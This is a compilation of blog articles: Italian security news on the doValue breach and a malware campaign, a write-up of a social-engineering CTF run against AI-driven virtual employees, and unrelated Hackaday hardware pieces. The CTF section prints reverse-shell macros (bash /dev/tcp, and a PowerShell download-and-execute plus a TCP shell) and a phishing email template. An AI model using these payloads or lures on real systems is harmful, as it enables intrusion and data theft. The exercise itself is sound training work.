Nel frattempo, su molti forum del dark web, sono stati pubblicati degli annunci di messa in vendita di oltre 16 terabyte di dati esfiltrati dalla rete di doValue e delle sue controllate, tra cui ItalFondiario, Altamira, doBank, doData, doNext, doValue Greece e doValue Spain.
Nel post vengono condivisi i treeview (ovvero l’alberatura in formato tetuale dei dati esfiltrati) , a conferma che i file proverrebbero da ambienti Active Directory aziendali. Vista la quantità ingente dei dati trafugati, l’attacco rappresenta un colpo pesante per l’intero comparto finanziario e della gestione del credito, evidenziando ancora una volta la vulnerabilità dei grandi ecosistemi IT altamente interconnessi.
L’azienda ha dichiarato di aver notificato il data breach al Garante per la Protezione dei Dati Personali e di essere impegnata a comunicare eventuali impatti diretti alle persone coinvolte, come previsto dalla normativa GDPR.
Dall’evento di cui sopra, come anticipato, è derivata una perdita di confidenzialità dei dati esfiltrati, che potrebbero essere usati da soggetti non autorizzati per finalità difformi da quelle per cui tali dati sono stati originariamente raccolti. In particolare, è possibile che terzi non autorizzati tentino di adoperare tali dati per compiere azioni di c.d. ‘ingegneria sociale’ e realizzare frodi. In ogni caso, a oggi non abbiamo evidenza di fenomeni di diffusione e/o pubblicazione dei dati esfiltrati. In questa sede, pertanto, richiamiamo la Sua attenzione sulla necessità di prestare la massima cautela con riguardo a eventuali comunicazioni che dovesse ricevere e con le quali Le dovesse venire richiesto di effettuare transazioni finanziarie e/o fornire informazioni personali, in quanto potrebbero derivare da un tentativo di frode. Pertanto, in caso di ricezione di tale tipo di comunicazioni e qualora l’interlocutore faccia riferimento a pratiche di gestione del credito gestite da doValue, Le raccomandiamo di accertare sempre l’effettiva autenticità e la provenienza delle stesse e la coerenza degli estremi di pagamento forniti (per esempio verificando l’attendibilità del mittente e contattando gli uffici di doValue ai recapiti ufficiali presenti nel nostro sito Internet e/o nelle comunicazioni scritte da noi ricevute nel contesto delle attività di recupero crediti, nonché, in caso di procedure giudiziali, anche prendendo contatti con il legale incaricato).
Conclusione
Il caso doValue si inserisce in una crescente ondata di attacchi mirati al settore finanziario europeo, e conferma l’evoluzione aggressiva delle tattiche impiegate dai cyber criminali. Red Hot Cyber continuerà a monitorare la situazione per fornire aggiornamenti in tempo reale e approfondimenti esclusivi.
L'articolo DoValue conferma la violazione con un comunicato stampa proviene da il blog della sicurezza informatica.
It’s 2025, And We Still Need IPv4! What Happens When We Lose It?
Some time last year, a weird thing happened in the hackerspace where this is being written. The Internet was up, and was blisteringly fast as always, but only a few websites worked. What was up? Fortunately with more than one high-end networking specialist on hand it was quickly established that we had a problem with our gateway’s handling of IPv4 addresses, and normal service was restored. But what happens if you’re not a hackerspace with access to the dodgy piece of infrastructure and you’re left with only IPv6? [James McMurray] had this happen, and has written up how he fixed it.
His answer came in using a Wireguard tunnel to his VPS, and NAT mapping the IPv4 space into a section of IPv6 space. The write-up goes into extensive detail on the process should you need to follow his example, but for us there’s perhaps more interest in why here in 2025, the loss of IPv4 is still something that comes with the loss of half the Internet. As of this writing, that even includes Hackaday itself. If we had the magic means to talk to ourselves from a couple of decades ago our younger selves would probably be shocked by this.
Perhaps the answer lies in the inescapable conclusion that IPv6 answers an address space problem of concern to many in technical spaces, it neither solves anything of concern to most internet users, nor is worth the switch for so much infrastructure when mitigations such as NAT make the IPv4 address space problem less of a problem. Will we ever entirely lose IP4? We’d appreciate your views in the comments. For readers anxious for more it’s something we looked at last year.
16TB di un’azienda italiana di Financial Service, in vendita nelle underground
Un’importante realtà operante nel settore della gestione e recupero crediti a livello europeo potrebbe essere finita nel mirino dei cybercriminali. Secondo quanto emerso da un annuncio comparso su un noto forum del dark web, un attore malevolo ha messo in vendita oltre 16 terabyte di dati esfiltrati dai server aziendali e da numerose controllate, dislocate in diversi Paesi, tra cui Grecia, Spagna e Italia.
L’azienda colpita gestisce asset finanziari per conto di banche e istituzioni, e si occupa di gestione di portafogli di crediti deteriorati (NPL), oltre a fornire servizi di due diligence, gestione documentale e supporto amministrativo. I dati compromessi includerebbero interi file system provenienti da server di database e Active Directory, contenenti probabilmente informazioni su clienti, documentazione interna, report finanziari, contratti e corrispondenze sensibili.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
Nel messaggio pubblicato dai cybercriminali, gli autori spiegano che i dati sono troppo voluminosi per essere condivisi come prova diretta, ma hanno pubblicato alberi delle directory per dimostrare l’entità dell’infiltrazione. I dati sembrano provenire da più domini Active Directory collegati alle sedi e sussidiarie europee del gruppo.
I dettagli del presunto attacco informatico
L’accesso ai dati viene offerto in vendita con prezzo negoziabile, e l’autore fornisce anche dei token di sessione per comunicazioni riservate con potenziali acquirenti. Una violazione di questa portata qualora confermata, rappresenta una minaccia concreta per migliaia di individui e istituzioni. Se confermati, i dati potrebbero contenere:
- Informazioni personali e bancarie di debitori
- Dati su portafogli finanziari e investimenti
- Documentazione legale riservata
- Strutture di gestione interna e credenziali di accesso
Inoltre, l’esposizione di infrastrutture Active Directory può facilitare nuove azioni offensive, come movimenti laterali all’interno delle reti, attacchi ransomware o compromissione di ambienti cloud integrati.
Conclusione
L’incidente evidenzia, ancora una volta, quanto siano vulnerabili anche le infrastrutture critiche delle aziende che gestiscono ingenti volumi di dati finanziari. È essenziale che tali enti adottino misure di cybersecurity avanzate, tra cui segmentazione delle reti, monitoraggio attivo, audit di sicurezza e piani di risposta agli incidenti.
Il settore del recupero crediti e della gestione patrimoniale, per la natura altamente sensibile dei dati trattati, rimane una delle aree più a rischio nel panorama delle minacce informatiche globali.
L'articolo 16TB di un’azienda italiana di Financial Service, in vendita nelle underground proviene da il blog della sicurezza informatica.
Reliving VHS Memories with NFC and ESPHome
Like many of us of a certain vintage, [Dillan Stock] at The Stock Pot is nostalgic for VHS tapes. It’s not so much the fuzzy picture or the tracking issues we miss, but the physical experience the physical medium brought to movie night. To recreate that magic, [Dillan] made a Modern VHS with NFC and ESPHome.
NFC tags are contained in handsomely designed 3D printed cartridges. You can tell [Dillan] put quite a bit of thought into the industrial design of these: there’s something delightfully Atari-like about them, but they have the correct aspect ratio to hold a miniaturized movie poster as a label. They’re designed to print in two pieces (no plastic wasted on supports) and snap together without glue. The printed reader is equally well thought out, with print-in-place springs for that all important analog clunk.
Electronically, the reader is almost as simple as the cartridge: it holds the NFC reader board and an ESP32. This is very similar to NFC-based audio players we’ve featured before, but it differs in the programming. Here, the ESP32 does nothing related directly to playing media: it is simply programmed to forward the NFC tag id to ESPHome. Based on that tag ID, ESPHome can turn on the TV, cue the appropriate media from a Plex server (or elsewhere), or do… well, literally anything. It’s ESPHome; if you wanted to make this and have a cartridge to start your coffee maker, you could.
If this tickles your nostalgia bone, [Dillan] has links to all the code, 3D files and even the label templates on his site. If you’re not sold yet, check out the video below and you might just change your mind. We’ve seen hacks from The Stock Pot before, everything from a rebuilt lamp to an elegant downspout and a universal remote.
youtube.com/embed/Jhhwn7OA_xY?…
CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta
La RHC Conference 2025, organizzata da Red Hot Cyber, ha rappresentato un punto di riferimento per la comunità italiana della cybersecurity, offrendo un ricco programma di talk, workshop e competizioni. Tra gli eventi più attesi, spiccano le Capture The Flag (CTF), che hanno coinvolto i partecipanti in sfide avvincenti e realistiche.
Queste CTF hanno portato i partecipanti nel cuore di una crisi geopolitica simulata: una Cyber Warfare Ibrida contro la nazione fittizia di Minzhong, in cui attori malevoli puntavano a sabotare la supply chain e le reti 4G locali. Questa simulazione, realizzata con il contributo di CyberSecurityUP, Hackmageddon e Fondazione Bruno Kessler (FBK), ha spinto i concorrenti a confrontarsi con tematiche moderne come AI, minacce ibride, disinformazione e infrastrutture critiche, alzando l’asticella del realismo tecnico e narrativo.
Una delle CTF più innovative è stata quella dedicata al Social Engineering, organizzata dalla FBK e dall’Università di Trento in collaborazione con il collettivo HackerHood, che ha offerto ai partecipanti un’esperienza immersiva e un approccio rivoluzionario per le sfide CTF, simulando un ambiente realistico gestito dall’intelligenza artificiale, che gli attaccanti potevano compromettere combinando tecniche di manipolazione psicologica con exploit tecnologici.
Una piattaforma di social engineering per una CTF realistica
La CTF sul Social Engineering si è distinta per l’uso innovativo di una piattaforma sperimentale sviluppata in ambito di ricerca. Questa piattaforma, creata da FBK e dall’Università di Trento, ha generato dinamicamente una finta infrastruttura ICT: indirizzi email, utenti fittizi, un servizio di storage cloud e identità virtuali dotate di personalità credibili, in grado di interagire in linguaggio naturale con i partecipanti.
Il cuore della competizione non era l’exploitation tecnica, ma l’inganno: convincere questi “personaggi virtuali” a rivelare informazioni sensibili, cliccare su link o scaricare allegati. Tutto questo grazie all’uso sapiente dell’ingegneria sociale, combinata con l’analisi dei dettagli dell’ambiente simulato.
Il contributo di HackerHood: test e adattamento
Il collettivo HackerHood ha avuto un ruolo essenziale nella riuscita della competizione, contribuendo non solo ad una validazione iniziale di tale piattaforma ma anche all’adattamento della stessa al contesto CTF. Dopo numerose sessioni di test, sono stati migliorati stabilità, scalabilità e credibilità dell’infrastruttura.
I partecipanti si sono trovati davanti a un ecosistema realistico e immersivo, in cui ogni azione produceva reazioni coerenti da parte degli utenti simulati, grazie a un motore di intelligenza artificiale generativa. Questo ha elevato notevolmente il livello di sfida, rendendo ogni interazione una prova di astuzia e precisione linguistica.
Le Flag della CTF: Social Engineering in azione
La CTF si è articolata in una serie di flag a difficoltà crescente, tutte basate sull’ingegneria sociale e sull’interazione con l’ambiente simulato. Ogni flag rappresentava una tappa nel percorso di compromissione dell’infrastruttura aziendale fittizia.
Panoramica delle principali flag
- Scopri la password di un dipendente
Obiettivo: convincere un dipendente a rivelare o lasciar trapelare la propria password. - Viola il ticket system aziendale
Obiettivo: scoprire l’indirizzo email nascosto del supporto IT e sfruttarlo per un attacco. - Recupera il file “lista-esuberi”
Obiettivo: ottenere un file riservato presente solo nel sistema di online file sharing. - Recupera una password condivisa
Obiettivo: identificare una mail interna in cui veniva condivisa una password aziendale. - Scopri la chiave privata del CEO
Obiettivo: recuperare una chiave SSH inviata via email, sfruttando altre compromissioni precedenti.
L’ultima sfida irrisolta “Leggi il contenuto del budget aziendale”
Questa flag rappresentava il punto avanzato dell’intera CTF: per ottenerla, i partecipanti dovevano recuperare e leggere un file PDF riservato chiamato budget-aziendale.pdf, presente solo sul laptop Windows del CEO. Il file era protetto da una password nota soltanto a chi avesse risolto la flag “Recupera una password condivisa” nascosta fra le conversazioni di due dipendenti.
L’obiettivo poteva essere raggiunto seguendo due percorsi alternativi, entrambi validi ma di difficoltà diversa:
1. Accesso tramite SSH:
Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre uno qualunque dei “personaggi virtuali” ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema Linux. Era quindi possibile utilizzare la chiave SSH ottenuta dal completamento della flag “Scopri la chiave privata del CEO” per accedere interattivamente e tramite movimento laterale al laptop del CEO e leggere il file localmente.
Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.
- Recupero della chiave privata del CEO: accedere alla casella mail del CEO e recuperare la sua chiave privata inviata tramite mail. La chiave era gia’ in possesso se la flag “Scopri la chiave privata del CEO” era gia’ stata completata.
- Estrazione della chiave privata del CEO: convincere il CEO a fornire il proprio ID, in modo da poter estrarre la chiave privata.
- Creazione del documento malevolo: creare un documento LibreOffice contenente una macro capace di aprire una reverse shell. Un esempio di macro e’ riportato di seguito.
Function Main
shell("bash -c 'bash -i &> /dev/tcp// 0>&1'")
End Function
- Invio del payload: inviare una mail ad uno dei dipendenti utilizzanti Linux allegando il file malevolo. Un testo di esempio di tale mail e’ riportato di seguito.
Gentile Utente,in allegato le nuove policy di sicurezza appena approvate. La invitiamo cortesemente a prenderne visione e a procedere alla loro attuazione al fine di migliorare la security posture dell'aziendaRestiamo a disposizione per ogni dubbio e chiarimento.Cordialmente,Il dipartimento IT.
- Upload della chiave privata del CEO: caricare sul laptop del dipendente la chiave privata del CEO ottenuta in precedenza.
- Movimento laterale: Utilizzare la shell acquisita sul laptop del dipendente per effettuare un movimento laterale, collegandosi tramite SSH al laptop del CEO mediante l’uso della chiave SSH.
- Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
- Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
- Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
2. Violazione diretta del laptop del CEO:
Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre il CEO ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema. Questa strategia era più complicata dal momento che sul portatile Windows era presente un antivirus.Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.
- Creazione del documento malevolo: creare un documento Microsoft Office contenente una macro capace di aprire una reverse shell. In questo caso era necessario operare delle operazioni di offuscamento sulla macro, poiché il laptop del CEO era protetto da un antivirus capace di bloccare le macro malevole in chiaro. Un esempio di macro in chiaro e’ riportato di seguito.
Sub Auto_Open()
Last = "powershell -exec bypass IEX ((new-object
net.webclient).downloadstring('http:///poc.txt')) -WindowStyle Minimized"
CreateObject("Wscript.Shell").Run Last
End Sub
Il contenuto del file poc.txt per questa macro e’ riportato di seguito.
$client = New-Object System.Net.Sockets.TCPClient("",);$stream=$client.GetStrean();[byte[]]$bytes = 0..655351|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCITEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Invio del payload: inviare una mail al CEO allegando il file malevolo. Un testo di esempio di tale mail e’ riportato al punto d del metodo procedente.
- Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
- Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
- Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
Entrambe le strategie richiedevano competenze trasversali, tempismo e il corretto uso delle flag ottenute in precedenza: la password del file veniva acquisita solo tramite la flag “Recupera una password condivisa”, e l’accesso al sistema era subordinato a compromissioni precedenti “Scopri la chiave privata del CEO” o “Scopri la password di un dipendente”.
Criticità e caratteristiche
- Il file non era accessibile tramite il sistema di file sharing in cloud.
- Era necessario ricostruire correttamente la topologia aziendale per pianificare l’accesso al dispositivo del CEO.
- Il file conteneva la flag finale, una frase ironica che rifletteva il tema aziendale fittizio della simulazione:
CTFRHC{{W3_H4V3_NO_M0R3_MON3Y}}
Completamento e Motivi del fallimento
Nonostante il 95% del percorso fosse stato risolto, nessun team è riuscito a ottenere questa flag e secondo una preliminare valutazione i principali motivi sono i seguenti:
- Gestione del tempo: i partecipanti sono arrivati molto vicini alla soluzione, ma non hanno avuto il tempo sufficiente per completare la catena finale di compromissioni e accessi necessari.
- Approccio tecnico predominante: molti team hanno preferito concentrarsi sull’identificazione e lo sfruttamento di possibili vulnerabilità tecniche dell’infrastruttura, sottovalutando la componente di social engineering, che in questo scenario era in realtà la chiave per aggirare i controlli e convincere i personaggi virtuali ad agire.
- Complessità dell’ambiente IA: il comportamento del CEO era gestito da un’IA configurata per ignorare email da contatti esterni, rendendo inefficaci approcci diretti e costringendo i team a cercare vie interne più complesse.
Conclusioni
I commenti raccolti al termine della competizione parlano chiaro: la combinazione di una piattaforma di social engineering realistica ed interazioni dinamiche guidate da intelligenza artificiale ha offerto ai partecipanti un’esperienza nuova e fresca rispetto alle altre sfide disponibili. Tutti i partecipanti erano concordi sul fatto che questo tipo di approccio fosse una ventata d’aria fresca rispetto alle classiche sfide, costringendoli anche a cambiare mentalità e prospettiva per poterla portare a termine.
La sfida ha alzato significativamente l’asticella, non solo in termini tecnici, ma soprattutto per la capacità di simulare scenari credibili, in cui il fattore umano è al centro del gioco. In un’epoca in cui la manipolazione dell’informazione e l’ingegneria sociale sono armi reali, esperienze come questa rappresentano un passo importante verso una formazione più completa, moderna e aderente alla realtà delle minacce informatiche. La sperimentazione ha dimostrato che è possibile fare didattica e ricerca in modo innovativo, coinvolgente e ad alto impatto.
Il presente articolo e le attività descritte sono frutto di una collaborazione tra FBK, Università di Trento ed Hackerhood. Si ringraziano Manuel Roccon, Matteo Bridi, Alessandro Molinari, Domenico Siracusa, Claudio Facchinetti e Daniele Santoro.
L'articolo CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta proviene da il blog della sicurezza informatica.
LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click
Un nuovo malware chiamato LightPerlGirl ha attirato l’attenzione degli esperti di sicurezza informatica per il suo insolito e pericoloso schema di penetrazione dei dispositivi. L’attacco si basa sulla tecnica ClickFix : una finta finestra pop-up CAPTCHA che avvia una complessa sequenza di azioni utilizzando PowerShell e metodi che consentono al codice dannoso di nascondersi completamente dalle soluzioni di sicurezza.
Il nome del malware trae ispirazione dalla riga interna del copyright: “Copyright (c) LightPerlGirl 2025“. La campagna di distribuzione del malware è stata notata per la prima volta dai ricercatori di Todyl dopo aver rilevato script PowerShell anomali su un dispositivo client. Questo è diventato il punto di partenza per indagare su un complesso schema di infezione a più fasi in grado di bypassare i meccanismi di difesa tradizionali.
L’infezione inizia visitando un sito compromesso, il più delle volte sulla piattaforma WordPress, come una risorsa di viaggio. Le pagine ospitano codice JavaScript dannoso, mascherato da controllo di sicurezza di provider noti come Cloudflare. Lo script richiama una finestra con un CAPTCHA falso che, interagendo con esso, richiede all’utente di avviarlo tramite la funzione Esegui di Windows, essenzialmente la prima fase dell’attacco.
Questo comando contatta il server C&C all’indirizzo “cmbkz8kz1000108k2carjewzf[.]info”, da cui viene scaricato il seguente script di PowerShell. Viene eseguito interamente in memoria e include tre moduli: HelpIO, Urex ed ExWpL. Ognuno di essi esegue attività specifiche volte a proteggere il malware nel sistema e a renderlo invisibile.
Il modulo HelpIO richiede i diritti amministrativi tramite la finestra UAC standard e aggiunge quindi un’eccezione a Windows Defender per la directory “C:\Windows\Temp”. Ciò consente il salvataggio dei componenti successivi senza generare allarmi nei programmi antivirus. Urex garantisce quindi una presenza persistente nel sistema scaricando un file bat chiamato “LixPay.bat” e posizionandolo nella directory Temp esclusa. Crea inoltre un collegamento all’avvio in modo che venga eseguito a ogni avvio del sistema.
L’elemento più complesso, ExWpL, non utilizza affatto il file system. Decrittografa un assembly .NET codificato in base64 e lo esegue direttamente in memoria utilizzando il metodo System.Reflection.Assembly.Load(). Questo approccio evita qualsiasi interazione con il disco, il che complica notevolmente il rilevamento.
Dopo aver completato tutte le fasi, il malware mantiene una connessione stabile con il server di comando e controllo, consentendo agli aggressori di eseguire comandi in tempo reale e di scaricare nuovi componenti senza lasciare tracce nel file system.
Secondo Todyl, il fattore critico dell’infezione è stata la mancanza di sistemi di protezione degli endpoint sul dispositivo attaccato, che ha consentito l’esecuzione dello script iniziale. Tuttavia, il team dell’azienda è riuscito a isolare l’host infetto utilizzando il proprio SIEM e l’analisi dei log degli script di PowerShell.
La chiave dell’attacco è il coinvolgimento dell’utente. Tutto inizia con un singolo clic su un CAPTCHA “sicuro” che esegue effettivamente il codice. Todyl sottolinea che nessun controllo di sicurezza dovrebbe richiedere l’inserimento manuale di comandi. Inoltre, si raccomanda di installare urgentemente strumenti di protezione completa degli endpoint e di utilizzare gli indicatori di compromissione forniti nel report per condurre un’analisi dell’infrastruttura.
LightPerlGirl è un esempio di come l’elegante ingegneria sociale e la sofisticatezza tecnica si fondano per creare una minaccia che non può essere ignorata.
L'articolo LightPerlGirl: Il Malware Invisibile che Sfugge agli Antivirus e Si Attiva con un Click proviene da il blog della sicurezza informatica.
Smallest Gaming Mouse Has Crazy Fast Polling Rate And Resolution
[juskim] wanted to build a tiny mouse, but it couldn’t just be any mouse. It had to be a high-tech gaming mouse that could compete with the best on raw performance. The results are impressive, even if the final build is perhaps less than ideal for pro-level gameplay.
The build riffs on an earlier build from [juskim] that used little more than a PCB and a 3D-printed housing to make a barebones skeleton mouse. However, this one ups the sophistication level. At the heart of the build is the nRF54L15 microcontroller, which is paired with a PAW3395 mouse sensor which is commonly used in high-end gaming mice. It offers resolution up to 26K DPI for accurate tracking, speeds up to 650 ips, and 8 kHz sampling rates. Long story short, if you want fine twitch control, this is the sensor you’re looking for. The sensor and microcontroller are laced together on a custom PCB with a couple of buttons, a battery, and a charging circuit, and installed in a barebones 3D-printed housing to make the final build as small as possible.
The only real thing letting the design down is the mouse’s key feature—the size. There’s very little body to grab on to and it’s hard to imagine being able to play most fast-paced games at a high level with such a tiny device. Nevertheless, the specs are hardcore and capable, even if the enclosure isn’t.
[juskim] loves building tiny peripherals; we’ve featured his fine work before, too. Video after the break.
youtube.com/embed/XgV3BgWfUFY?…
Reservoir Sampling, or How to Sample Sets of Unknown Size
Selecting a random sample from a set is simple. But what about selecting a fair random sample from a set of unknown or indeterminate size? That’s where reservoir sampling comes in, and [Sam Rose] has a beautifully-illustrated, interactive guide to how reservoir sampling works. As far as methods go, it’s as elegant as it is simple, and particularly suited to fairly sampling dynamic datasets like sipping from a firehose of log events.
While reservoir sampling is simple in principle it’s not entirely intuitive to everyone. That’s what makes [Sam]’s interactive essay so helpful; he first articulates the problem before presenting the solution in a way that makes it almost self-evident.
[Sam] uses an imaginary deck of cards to illustrate the problem. If one is being dealt cards one at a time from a deck of unknown size (there could be ten cards, or a million), how can one choose a single card in a way that gives each an equal chance of having been selected? Without collecting them all first?
In a nutshell, the solution is to make a decision every time a new card arrives: hold onto the current card, or replace it with the new one. Each new card is given a 1/n chance of becoming held, where n is the number of cards we’ve seen so far. That’s all it takes. No matter when the dealer stops dealing, each card that has been seen will have had an equal chance of ending up the one selected.
There are a few variations which [Sam] also covers, and practical ways of applying it to log collection, so check it out for yourself.
If [Sam]’s knack for illustrating concepts in an interactive way is your jam, we have one more to point out. Our own Al Williams wrote a piece on Turing machines; the original “universal machine” being a theoretical device with a read/write head and infinite paper tape. A wonderful companion to that article is [Sam]’s piece illustrating exactly how such a Turing machines would work in an interactive way.
Hack Swaps Keys for Gang Signs, Everyone Gets In
How many times do you have to forget your keys before you start hacking on the problem? For [Binh], the answer was 5 in the last month, and his hack was to make a gesture-based door unlocker. Which leads to the amusing image of [Binh] in a hallway throwing gang signs until he is let in.
The system itself is fairly simple in its execution: the existing deadbolt is actuated by a NEMA 17 stepper turning a 3D printed bevel gear. It runs 50 steps to lock or unlock, apparently, then the motor turns off, so it’s power-efficient and won’t burn down [Binh]’s room.
The software is equally simple; mediapipe is an ML library that can already do finger detection and be accessed via Python. Apparently gesture recognition is fairly unreliable, so [Binh] just has it counting the number of fingers flashed right now. In this case, it’s running on a Rasberry Pi 5 with a webcam for image input. The Pi connects via USB serial to an ESP32 that is connected to the stepper driver. [Binh] had another project ready to be taken apart that had the ESP32/stepper combo ready to go so this was the quickest option. As was mounting everything with double-sided tape, but that also plays into a design constraint: it’s not [Binh]’s door.
[Binh] is staying in a Hacker Hotel, and as you might imagine, there’s been more penetration testing on this than you might get elsewhere. It turns out it’s relatively straightforward to brute force (as you might expect, given it is only counting fingers), so [Binh] is planning on implementing some kind of 2FA. Perhaps a secret knock? Of course he could use his phone, but what’s the fun in that?
Whatever the second factor is, hopefully it’s something that cannot be forgotten in the room. If this project tickles your fancy, it’s open source on GitHub, and you can check it out in action and the build process in the video embedded below.
After offering thanks to [Binh] for the tip, the remaining words of this article will be spent requesting that you, the brilliant and learned hackaday audience, provide us with additional tips.
youtube.com/embed/yNJkpo-19DI?…
Subpixel Rendering For Impossibly Small Terminal Text
When it comes to text, how small is too small? The experts say a six point font is the minimum for readability, but as [James Bowman] shows us, you can get away with half of that.
The goal is to produce a 40-character display on a 24 mm x 24 mm LCD that has a resolution of 240 x 240 to show a serial terminal (or other data) on the “TermDriver2” USB-to-Serial adapter. With 24 lines, that’s a line per millimeter: very small text. Three points, to be precise, half what the experts say you need. Diving this up into 40 columns gives a character cell of six by nine pixels. Is it enough?
The raw font on the left, the subpixel rendering on the right. For once, it’s better if you don’t click to enlarge.
Not by itself, no. That’s where the hack comes in: sub-pixel rendering. After all, a “white” pixel on an LCD is actually three elements: a red, a green, and a blue subpixel, stacked side-by-each. Drive each of those subpixels independently and 240 pixels now becomes 720. That’s plenty for a 40 column terminal.
The article discusses how, in general terms, they pulled off the subpixel rendering and kept the font as legible as possible. We think it’s a good try, though the colored fringe around the characters can be uncomfortable to look at for some people — and then we can’t forget the physical size of the characters being 1 mm tall.
If this trick were being used on a larger display with a 240-wide resolution, we’d say “yes, very legible, good job!”– but at this size? We hope we can find our reading glasses. Still, it’s a neat trick to have in your back pocket for driving low-resolution LCDs.
It may not surprise you that aside from improving legibility, subpixel rendering is also used for pixel (er, sub-pixel) art.
The full set of glyphs in their subpixel-rendered glory.
FLOSS Weekly Episode 839: I Want to Get Paid Twice
This week Jonathan chats with benny Vasquez about AlmaLinux! Why is AlmaLinux the choice for slightly older hardware? What is the deal with RISC-V? And how does EPEL fit in? Tune in to find out!
- linkedin.com/in/bennyvasquez/
- almalinux.org
- almalinux.org/blog/2025-04-24-…
- almalinux.org/blog/2025-06-26-…
youtube.com/embed/5G-wIcFLrnM?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/07/02/floss-…
South Korea Brought High-Rise Fire Escape Solutions To The Masses
When a fire breaks out in a high-rise building, conventional wisdom is that stairwells are the only way out. Lifts are verboten in such scenarios, while sheer height typically prevents any other viable route of egress from tall modern buildings. If the stairs are impassable, or you can’t reach them, you’re in dire peril.
In South Korea, though, there’s another option for escape. The answer involves strapping on a harness and descending down ropes hanging off the side of the building, just like in an action movie. It might sound terrifying, but these descending lifeline devices have become a common part of fire safety infrastructure across the country.
Going Down
The concept is elegantly simple—tall buildings like apartments and hotels feature compact rope escape devices that can be quickly deployed from windows or balconies. These allow people to control their descent down the exterior of a building in the event that there is no other route of escape. While fleeing a building down a rope is typically the preserve of fictional spies or trained climbers, these carefully engineered systems are designed for use by ordinary people in emergency situations.
youtube.com/embed/tboKzq3lx8M?…
The typical Korean descending lifeline comes as a kit with some simple components. It consists of a rope or cable, a friction-based descent control mechanism, and a harness system that can be donned quickly by sliding under the arms and tightening a strap. Deploying the device is relatively simple. The rope reel is attached to a large deployable hook that is firmly mounted to the building’s wall, using a screw-threaded coupling. The rope is then thrown out the window. At this point, the user merely needs to attach the harness and tighten it prior to leaving the building.A typical lifeline descent kit, manufactured by Kfire. Credit: Kfire
When exiting the window, the user is instructed to face the wall on the way down, using their hands and/or feet to control the descent. Ultimately, though, the mechanical speed regulator ensures a safe pace of descent. The devices only allow the descent of one person at at time. However, each end of the rope has a harness. Thus, when one user has descended to ground level, the next person can grab the harness at the other end which has ascended to the window, and begin their descent. This can continue for as many people as needed.
Key to these devices is their focus on simplicity. The descent control mechanism uses a geared braking system that automatically limit the speed of descent to 1.5 meters/sec or less, preventing the user from descending too quickly even if they panic and release their grip. The lifelines are also sold in a range of different lengths to suit the heights of individual floors in a building. This is important to ensure that as the user hits the ground, the other end of the rope has carried the other harness back up to the floor for the next user. The longest variants typically sold are 45 meters in length, intended for buildings up to 15 stories tall. Limits of practicality mean that while these lifelines are useful for many buildings, they’re perhaps not applicable to taller skyscrapers where such escape would be more difficult.
The engineering challenge here isn’t just mechanical. Automatic rope descent systems are a well understood technology, as are hooks and brackets rated to carry human weight for climbing or otherwise. The real challenge comes down to human factors—in that these systems need to be something people can figure out how to use under conditions of extreme stress. The devices need to be intuitive enough that someone who has never used one before can figure it out while a fire rages behind them. It’s one thing to learn how to use a rope descent system by watching a video and trying the equipment at a calm training session. It’s another thing entirely to do so while a fire rages in the hotel hallway behind you.
While these lifeline systems are relatively simple, they’re still a lot more complicated to use than something like an airliner life jacket. Requiring an inexperienced end user to thread a fitting on a rope coupler without dropping it out the window in a panic situation is a tall ask. Still, the lifelines provide a useful additional escape option. It may not be the easiest way out of the building, or anybody’s first choice, but when there’s no other option, it’s good to have.
South Korea’s adoption of these systems reflects both the country’s high-rise-heavy urban landscape and a pragmatic approach to disaster preparedness. Many apartment buildings and hotels are now required to have these devices installed. The devices are typically mounted in weatherproof boxes near windows or on balconies, ready for deployment when traditional escape routes are compromised. In some cases, the rugged boxes the lifelines come in can even be used as a step-up to ease egress out of higher windows.
Perhaps most importantly, these systems represent a shift in traditional thinking about fire safety. In most jurisdictions, the idea of asking average people to belay down a building is considered untenable—too dangerous and too complicated. In South Korea, the lifelines are on hand, and put control back in the hands of building occupants. When every second counts and traditional escape routes have failed, having a lifeline system could mean the difference between life and death. It’s a sobering reminder that sometimes the best high-tech solution is one that lets people save themselves.
Making a Smarter Laptop Cooler
